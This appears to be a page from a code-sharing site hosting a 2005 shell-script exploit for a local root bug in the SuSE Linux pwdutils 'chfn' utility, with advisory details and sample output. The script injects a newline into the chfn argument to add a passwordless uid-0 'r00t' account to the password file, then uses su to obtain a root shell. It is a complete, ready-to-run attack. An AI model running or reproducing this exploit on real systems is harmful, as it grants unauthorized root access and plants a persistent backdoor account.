08112005-2.txt
来自「一些可以实现益出的程序」· 文本 代码 · 共 46 行
TXT
46 行
SuSE Linux pwdutils "chfn" Utility Local Privilege Escalation Exploit
Date : 08/11/2005
Advisory ID : FrSIRT/ADV-2005-2313
Rated as : Moderate Risk
#!/bin/sh
#
# Exploit for SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0
# and SuSE Linux Enterprise Server {8,9} 'chfn' local root bug.
#
# by Hunger <susechfn@hunger.hu>
#
# Advistory:
# http://lists.suse.com/archive/suse-security-announce/2005-Nov/0002.html
#
# hunger@suse:~> id
# uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
# hunger@suse:~> ./susechfn.sh
# Type your current password to get root... :)
# Password:
# sh-2.05b# id
# uid=0(r00t) gid=0(root) groups=0(root)
if [ X"$SHELL" = "X" ]; then
echo "No SHELL environment, using /bin/sh for default."
export SHELL=/bin/sh
fi
if [ -u /usr/bin/chfn ]; then
/bin/echo "Type your current password to get root... :)"
/usr/bin/chfn -h "`echo -e ':/:'$SHELL'\nr00t::0:0:'`" $USER > /dev/null
if [ -u /bin/su ]; then
/bin/su r00t
/bin/echo "You can get root again with 'su r00t'"
else
echo "/bin/su file is not setuid root :("
fi
else
echo "/usr/bin/chfn file is not setuid root :("
fi
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?